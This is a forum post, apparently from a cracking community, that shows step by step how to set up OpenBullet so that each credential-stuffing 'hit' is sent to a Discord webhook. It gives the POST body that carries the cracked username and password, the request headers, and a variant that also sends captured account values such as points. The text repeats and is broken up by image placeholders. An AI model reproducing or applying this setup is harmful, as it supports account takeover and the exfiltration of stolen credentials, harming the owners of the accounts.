colegreyx
User Interaction Specialist
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
400 XP
Hello, Nulled members!
Today i'll show you how to redirect your OpenBullet Hits with a Discord Webhook
Requirements:
- OpenBullet (
- Discord (https://discord.com/download)
- 10 IQ
Show me some love if you want more tutorials!
2.Open OpenBullet and click on Configs (you can find it between Worldlists & Hits DB at the top)
3.Select the config you're going to use and press "Edit"
4.Click on the plus button, then click on REQUEST
5.Now paste the following codes in next places:
Paste the copied webhook url in "URL"
Change Method from "GET" to "POST"
Paste this in "POST DATA":
Change Content-Type from "application/x-www-form-urlencoded" to "application/json"
Paste this in "Custom Headers":
It should look like that:
6.If your config have capture and you want it too do that:
For example your config capture points,
you just need to use the "Var/Cap Name" of it.
If my Cap Name it's Points for example i'll add it like that:
7.Here it's the result of all from above:
Today i'll show you how to redirect your OpenBullet Hits with a Discord Webhook
Requirements:
- OpenBullet (
- Discord (https://discord.com/download)
- 10 IQ
Show me some love if you want more tutorials!
Loading…
cdn.discordapp.com
3.Select the config you're going to use and press "Edit"
Loading…
cdn.discordapp.com
Loading…
cdn.discordapp.com
Paste the copied webhook url in "URL"
Change Method from "GET" to "POST"
Paste this in "POST DATA":
Code:
{"content":"```<USER>:<PASS>```"}
Paste this in "Custom Headers":
Code:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Pragma: no-cache
Accept: */*
Loading…
media.discordapp.net
For example your config capture points,
you just need to use the "Var/Cap Name" of it.
If my Cap Name it's Points for example i'll add it like that:
Code:
{"content":">>> ```<USER>:<PASS>:<Points>```"}
Loading…
cdn.discordapp.com